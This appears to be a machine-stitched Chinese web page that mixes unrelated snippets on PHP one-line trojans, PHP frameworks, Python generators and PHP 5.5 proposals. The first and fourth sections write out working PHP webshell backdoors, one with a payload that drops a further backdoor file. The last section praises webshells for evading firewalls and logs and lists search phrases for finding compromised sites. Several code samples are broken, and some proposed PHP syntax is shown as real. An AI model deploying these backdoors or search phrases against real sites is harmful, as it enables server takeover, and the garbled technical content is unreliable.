php木马生成器

① php一句话木马～呢

超级隐蔽的PHP后门：
<?php $_GET[a]($_GET[b]);?>

仅用GET函数就构成了木马；
利用方法：
?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%%29%29};

执行后当前目录生成c.php一句话木马，当传参a为eval时会报错木马生成失败，为assert时同样报错，但会生成木马，真可谓不可小视，简简单单的一句话，被延伸到这般应用

② 当今较为常见的3种 web应用程序开发平台类型

Openbiz Cubi PHP开发框架

这显然是一个高耦合性的框架的代表，有点让开发人员“拎包入住”快捷酒店一样的的感觉。Openbiz Cubi 是一个应用平台式的开发框架。虽然与众多更加耳熟能详的框架相比 Openbiz Cubi 仍然是一匹黑马，但是还是一个十分值得推荐的框架。它自身基于Zend Framework构建，但是拥有自己独特的基于元数据的 MVC 和 ORM 逻辑，并采用Smarty和PHP模板 作为主要UI的模板引擎，所以如果你是Zend框架的玩家，别担心，Openbiz Cubi的代码也会同样让你很容易上手。
它不同于其他传统意义上的PHP框架，它具有一个类似JAVA的元数据引擎， 可以通过XML的方式来“描述”大多数对象，甚至通过XML的描述就可以实现数据的CRUD（增删读改）这些操作。如果你的业务需求仅仅是要实现一些简单 的数据CRUD操作，你甚至不需要去写什么PHP代码，XML就可以全部搞定。而你的PHP功夫可以通过他的Plugin-Service方式用于集中在 实现某些特殊的业务逻辑上。

Openbiz Cubi目 前还有一个叫做 Openbiz Appbuilder 的超级好用的代码生成工具，对于还不熟Openbiz的XML元数据的开发人员来说，Appbuilder 绝对是一个可以帮助你快速上手的利器，他通过图形界面的生成向导来帮你自动创建数据对象、表单对象、嵌入式服务，甚至整个应用程序的雏形。 按Openbiz的官方介绍来说，你只需要思考清楚你的应用程序的业务逻辑，剩下的代码工作就交给Openbiz Appbuilder来帮你搞定吧。

CakePHP 开发框架

如果你仍然需要编写面向PHP4兼容的代码，CakePHP 将是一个非常不错的选择， 在PHP 4 & 5的MVC式框架列表里面，CakePHP都曾经是最流行的。它还提供了很多种途径的技术支持（讨论组、留言板、IRC等）还有优秀的教程。 CackePHP是个很容易上手的框架，但是你并不容易在短短几周的时间就完全掌握它。

Zend Framework框架

Zend Framework 是面对一些较有经验的开发者和从底层构建一些企业级应用程序而设计的。（例如：宣称面向企业应用而设计的 Openbiz Cubi 就是基于Zend Framework框架之上而构建的。）该框架是高度模块化的。这意味着你可以按你的实际需要来引用Zend的代码。有些函数库甚至可以很容的被提取出来 单独使用（例如Zend_Gdata，这也是个低耦合性的特点）使用Zend框架，你不必非要遵从它的MVC架构，（虽然你最好能这么做），并且它还提供 了许多内建的高级功能用于完成与现有的web服务整合，多语言化和实现单元测试这些任务。

CodeIgniter

CodeIgniter 是一个PHP5.2+ 的MVC框架，它体积小巧切具有丰富的文档资源。通常被称为“初学者框架”，因为它相对容易试用和较短的学习曲线，此外CodeIgniter也是十分灵 活和强大的。该框架拥有一个非常庞大的社区支持。并且在社区里面很大桐容易找到大量的CI函数库，你可以大胆的梦想， 也许你正需要做的事情在社区的某个交流，某个人已经把它实现了。

Symfony

Symfony 是最古老的PHP框架之一（相信你从他的网站风格上也发现这一点了），他同样也是转为企业级Web应用程序而设计的。然而，对于他所能提供的所有动力和性 能而言，它只拥有很小的体积并且非常滚帆坦容易配置在大多数php的主机环境中。由于他的年头最长久，你会很容易找到许多关于Symfony的教程、书记等资 料，对于新手来说，这绝对是件好事儿。
Symfony使用命令行代码生成工具来为项目快速生成所需的代码，这种方式也许对于某些开发人员来说是前所未闻的（在那个年头，也许 吧。。。）然后，他可以帮助你在很短的时间里完成轿段代码并是他们可以运行。Symfony的网站上手机了大量的教程和范例代码，来帮助你熟悉掌握他们。

Yii Framework

Yii 是一个高度模块化，高性能的PHP5框架，专门为了Web应用程序而开发。Yii采用了大量的命令行生成工具，让你可以快速的生成一些代码，因此，他最适 合于喜欢在命令行的黑窗口上敲敲打打的人。所有这些代码生成工具意味着你需要记住更多的命令和参数，但是一点你做到了，你会发现，它们将大大减少你所要花 费的时间来设置和配置你的应用程序。
这种开发方式 非常类似于Openbiz Appbuilder所提供的向导式的代码生成方式，最大的不同点是Yii是基于命令行去生成代码，Openbiz Appbuilder是在图形界面上生成代码。

ThinkPHP

ThinkPHP是一个免费开源的，快速、简单的面向对象的轻量级PHP 开发框架，遵循 Apache2 开源协议发布，是为了简化企业级应用开发和敏捷WEB应用开发而诞生的。借鉴了国外很多优秀的框架和模式，使用面向对象的开发结构和 MVC 模式，融合了 Struts 的 Action 思想和 JSP 的 TagLib（标签库）、 RoR 的ORM映射和 ActiveRecord 模式， 封装了 CURD 和一些常用操作， 单一入口模式等，在模版引擎、缓存机制、认证机制和扩展性方面均有独特的表现。

Yii Framework

Yii是一个基于组件的高性能PHP框架，用于开发大型Web应用。Yii采用严格的OOP编写，并有着完善的库引用以及全面的教程。从 MVC，DAO/ActiveRecord，widgets，caching，等级式RBAC，Web服务，到主题化，I18N和L10N，Yii提供了今日Web 2.0应用开发所需要的几乎一切功能。事实上，Yii是最有效率的PHP框架之一。
Yii是一个高性能的PHP5的web应用程序开发框架。通过一个简单的命令行工具 yiic 可以快速创建一个web应用程序的代码框架，开发者可以在生成的代码框架基础上添加业务逻辑，以快速完成应用程序的开发

phalcon

Phalcon是一套实现MVC架构的高性能PHP应用程序框架。初始版本发布于2012年11月，开放源代码并基于BSD授权条款。与其他大部分的PHP框架不同，Phalcon是以扩充的方式以C语言所编写，因此Phalcon的执行速度高过其他PHP框架，并且消耗更少的资源，根据官方的测试，Phalcon是目前世界上速度最快的PHP框架之一。[1]

③ python生成器到底有什么优点

在Python这门语言中，生成器毫无疑问是最有用的特性之一。与此同时，也是使用的最不广泛的Python特性之一。究其原因，主要是因为，在其他主流语言里面没有生成器的概念。正是由于生成器是一个“新”的东西，所以，它一方面没有引起广大工程师的重视，另一方面，也增加了工程师的学习成本，最终导致大家错过了Python中如此有用的一个特性。

1. 迭代器协议

由于生成器自动实现了迭代器协议，而迭代器协议对很多人来说，也是一个较为抽象的概念。所以，为了更好的理解生成器，我们需要简单的回顾一下迭代器协议的概念。

迭代器协议是指：对象需要提供next方法，它要么返回迭代中的下一项，要么就引起一个StopIteration异常，以终止迭代

可迭代对象就是：实现了迭代器协议的对象

协议是一种约定，可迭代对象实现迭代器协议，Python的内置工具(如for循环，sum，min，max函数等)使用迭代器协议访问对象。

举个例子：在所有语言中，我们都可以使用for循环来遍历数组，Python的list底层实现是一个数组，所以，我们可以使用for循环来遍历list。

2. 生成器

Python使用生成器对延迟操作提供了支持。所谓延迟操作，是指在需要的时候才产生结果，而不是立即产生结果。这也是生成器的主要好处。

Python有两种不同的方式提供生成器：

生成器函数：常规函数定义，但是，使用yield语句而不是return语句返回结果。yield语句一次返回一个结果，在每个结果中间，挂起函数的状态，以便下次重它离开的地方继续执行

生成器表达式：类似于列表推导，但是，生成器返回按需产生结果的一个对象，而不是一次构建一个结果列表

4. 使用生成器的注意事项

5. 总结

本文深入浅出地介绍了Python中，一个容易被大家忽略的重要特性，即Python的生成器。为了讲解生成器，本文先介绍了迭代器协议，然后介绍了生成器函数和生成器表达式，并通过示例演示了生成器的优点和注意事项。在实际工作中，充分利用Python生成器，不但能够减少内存使用，还能够提高代码可读性。掌握生成器也是Python高手的标配。希望本文能够帮助大家理解Python的生成器。

④ 写一个PHP一句话木马密码为file

PHP一句话木马是一种利用PHP的eval函数执行任意代码的后门程序。一般格式为雹歼培：
<?php @eval ($_POST ['password']);?>

其中，password是连接木马时需要输入的密码，可以自定义。如果您想要写一个密码为file的一句话木马，那么可以这样写：
<?php @eval ($_POST ['file']);?>

请注意，这种木马非常源唯危险，可能导致网站被黑客入侵或破坏，请谨慎使用改橡。

⑤ php木马上传打开直接下载php文件是什么原因

这个问题是由nginx引起的，没有进行php配置或者配置错误
php框架对很多新手而言可能会觉得很难攀越，其实不然，只要知道一个框架的流程，明白原理了，基本类似框架都可以看懂，php框架真正的发展要从php5开始了，其实php4时代就有一些框架，但是因为框架并没有给大家带来多方便而觉得很复杂，速度没有纯php好，所以一直到了php5才有大的发展，php5的面向对象模型的修改对框架的发展起了很大的作用。
框架就是通过提供一个开发Web程序的基本架构，PHP开发框架把PHPWeb程序开发摆到了流水线上。换句话说，PHP开发框架有助于促进快速软件开发（RAD），这节约了你的时间，有助于创建更为稳定的程序，并减少开发者的重复编写代码的劳动。这些框架还通过确保正确的数据库操作以及只在表现层编程的方式帮助初学者创建稳定的程序。PHP开发框架使得你可以花更多的时间去创造真正的Web程序，而不是编写重复性的代码。

⑥ PHP5.5 将会带来哪些新特征

1、放弃对Windows XP和2003 的支持

PHP5.5 将不再支持Windows XP和2003，这些系统已经有十年的历史，所以PHP将不再提供支持。

2、弃用e修饰符

e修饰符是指示 preg_replace函数用来评估替换字符串作为PHP代码，而不只是仅仅做一个简单的字符串替换。不出所料，这种行为会源源不断的出现安全问题。这就是为什么在PHP5.5 中使用这个修饰符将抛出一个弃用警告。作为替代，你应该使用 preg_replace_callback函数。你可以从 RFC找到更多关于这个变化相应的信息。

新增函数和类

接下来，我们将看到在计划之中的新增函数和类：

boolval()

PHP已经实现了strval、intval和floatval的函数。为了达到一致性将添加boolval函数。它完全可以作为一个布尔值计算，也可以作为一个回调函数。

hash_pbkdf2()

PBKDF2全称“Password-Based Key Derivation Function 2”，正如它的名字一样，是一种从密码派生出加密密钥的算法。这就需要加密算法，也可以用于对密码哈希。更广泛的说明和用法示例，请参阅 RFC。

intl 扩展

将有许多改进 intl的扩展。例如，将会有新的IntlCalendar,IntlGregorianCalendar,IntlTimeZone,IntlBreakIterator,IntlRuleBasedBreakIterator,IntlCodePointBreakIterator类。之前，我竟然不知道有这么多关于intl扩展，如果你想知道更多，我建议你去最新公告里找 Calendar和 BreakIterator。

array_column()

有一个 提议，新增array_column(或array_pluck)函数，它的表现如下:
<?php

$userNames = array_column($users, 'name');
// is the same as
$userNames = [];
foreach ($users as $user) {
$userNames[] = $user['name'];
}
像这样从数据库获取一列，但返回是数组。

一个简单的密码散列API

最近的密码泄漏(从LinkedIn等)显示，即使是大型网站也不知道如何正确地散列密码。几年前人们一直提倡使用bcrypt，但大多数人似乎仍然是使用完全不安全的sha1哈希值。

我们认为这样做的原因可能是真的很难使用crypt函数的API。因此我们会采用一个新的、简单的API，用于安全的密码散列：
<?php

$password = "foo";

// creating the hash
$hash = password_hash($password, PASSWORD_BCRYPT);

// verifying a password
if (password_verify($password, $hash)) {
// password correct!
} else {
// password wrong!
}
新的散列API提供了一些更多的特性，请参阅 RFC。

语言改变

现在真正有趣的东西：新的语言特性和增强功能。

常量引用

“常量引用”意味着数组可以直接操作字符串和数组字面值。举两个例子:
<?php

function randomHexString($length) {
$str = '';
for ($i = 0; $i < $length; ++$i) {
$str .= "0123456789abcdef"[mt_rand(0, 15)]; // direct dereference of string
}
}

function randomBool() {
return [false, true][mt_rand(0, 1)]; // direct dereference of array
}
我不认为在实践中会使用此功能，但它使语言更加一致。请参阅 RFC。

调用empty()函数(和其他表达式)一起工作

目前，empty()语言构造只能用在变量，而不能在其他表达式。在特定的代码像empty($this->getFriends())将会抛出一个错误。作为PHP5.5 这将成为有效的代码。更多信息请参阅 RFC。

获取完整类别名称

PHP5.3 中引入命名空间的别名类和命名空间短版本的功能。虽然这并不适用于字符串类名称:
<?php

use Some\Deeply\Nested\Namespace\FooBar;

// does not work, because this will try to use the global `FooBar` class
$reflection = new ReflectionClass('FooBar');
为了解决这个问题采用新的FooBar::class语法，它返回类的完整类别名称：
<?php

use Some\Deeply\Nested\Namespace\FooBar;

// this works because FooBar::class is resolved to "Some\\Deeply\\Nested\\Namespace\\FooBar"
$reflection = new ReflectionClass(FooBar::class);
更多示例请参阅 RFC。

参数跳跃

如果你有一个函数接受多个可选的参数，目前没有办法只改变最后一个参数，而让其他所有参数为默认值。

RFC上的例子，如果你有一个函数如下：
function create_query($where, $order_by, $join_type='', $execute = false, $report_errors = true) { ... }
那么有没有办法设置$report_errors=false，而其他两个为默认值。为了解决这个跳跃参数的问题而提出：
create_query("deleted=0", "name", default, default, false);
我个人不是特别喜欢这个提议。在我的眼睛里，代码需要这个功能，只是设计不当。函数不应该有12个可选参数。

标量类型提示

标量类型提示原本计划进入5.4，但由于缺乏共识而没有做。获取更多关于为什么标量类型提示没有做进PHP的信息，请参阅： 标量类型提示比你认为的更难。

对于PHP5.5 而言，针对标量类型提示讨论又一次出现，我认为这是一个相当不错的 提议。

它需要通过输入值来指定类型。例如：123,123.0,“123”都是一个有效的int参数输入，但“hello world”就不是。这与内部函数的行为一致。
function foo(int $i) { ... }

foo(1); // $i = 1
foo(1.0); // $i = 1
foo("1"); // $i = 1
foo("1abc"); // not yet clear, maybe $i = 1 with notice
foo(1.5); // not yet clear, maybe $i = 1 with notice
foo([]); // error
foo("abc"); // error
Getter 和 Setter

如果你从不喜欢写这些getXYZ()和setXYZ($value)方法，那么这应该是你最受欢迎的改变。提议添加一个新的语法来定义一个属性的设置/读取:
<?php

class TimePeriod {
public $seconds;

public $hours {
get { return $this->seconds / 3600; }
set { $this->seconds = $value * 3600; }
}
}

$timePeriod = new TimePeriod;
$timePeriod->hours = 10;

var_mp($timePeriod->seconds); // int(36000)
var_mp($timePeriod->hours); // int(10)
当然还有更多的功能，比如只读属性。如果你想要知道更多，请参阅 RFC。

生成器

目前，自定义迭代器很少使用，因为它们的实现，需要大量的样板代码。生成器解决这个问题，并提供了一种简单的样板代码来创建迭代器。

例如，你可以定义一个范围函数作为迭代器:
<?php

function *xrange($start, $end, $step = 1) {
for ($i = $start; $i < $end; $i += $step) {
yield $i;
}
}

foreach (xrange(10, 20) as $i) {
// ...
}
上述xrange函数具有与内建函数相同的行为，但有一点区别：不是返回一个数组的所有值，而是返回一个迭代器动态生成的值。

获取更深入的介绍请参阅 RFC。

列表解析和生成器表达式

列表解析提供一个简单的方法对数组进行小规模操作:
$firstNames = [foreach ($users as $user) yield $user->firstName];
上述列表解析相等于下面的代码：
$firstNames = [];
foreach ($users as $user) {
$firstNames[] = $user->firstName;
}
也可以这样过滤数组:
$underageUsers = [foreach ($users as $user) if ($user->age < 18) yield $user];
生成器表达式也很类似，但是返回一个迭代器(用于动态生成值)而不是一个数组。

⑦ 什么是php webshell

webshell是web入侵的脚本攻击工具。简单的说来，webshell就是一个asp或php木马后门，黑客在入侵了一个网站后，常常在将这些asp或php木马后门文件放置在网站服务器的web目录中，与正常的网页文件混在一起。然后黑客就可以用web的方式，通过asp或php木马后门控制网站服务器，包括上传下载文件、查看数据库、执行任意程序命令等。

为了更好理解webshell我们学习两个概念：

什么是“木马”？“木马”全称是“特洛伊木马(Trojan Horse)”，原指古希腊士兵藏在木马内进入敌方城市从而占领敌方城市的故事。在Internet上，“特洛伊木马”指一些程序设计人员在其可从网络上下载(Download)的应用程序或游戏中，包含了可以控制用户的计算机系统的程序，可能造成用户的系统被破坏甚至瘫痪。
什么是后门？大家都知道，一台计算机上有65535个端口，那么如果把计算机看作是一间屋子，那么这65535个端口就可以它看做是计算机为了与外界连接所开的65535扇门。每个门的背后都是一个服务。有的门是主人特地打开迎接客人的（提供服务），有的门是主人为了出去访问客人而开设的（访问远程服务）——理论上，剩下的其他门都该是关闭着的，但偏偏由于各种原因，很多门都是开启的。于是就有好事者进入，主人的隐私被刺探，生活被打扰，甚至屋里的东西也被搞得一片狼迹。这扇悄然被开启的门——就是“后门”。
webshell的优点
webshell 最大的优点就是可以穿越防火墙，由于与被控制的服务器或远程主机交换的数据都是通过80端口传递的，因此不会被防火墙拦截。并且使用webshell一般不会在系统日志中留下记录，只会在网站的web日志中留下一些数据提交记录，没有经验的管理员是很难看出入侵痕迹的。

如何寻找webshel：

1，脚本攻击SQL注入

2，使用注入工具

3，在浏览器里打开网络,输入搜索关键词"在本页操作不需要FSO支持&"或者"一次只能执行一个操作",然后点击搜索,很快就可以看到检索到了大量的查询结果.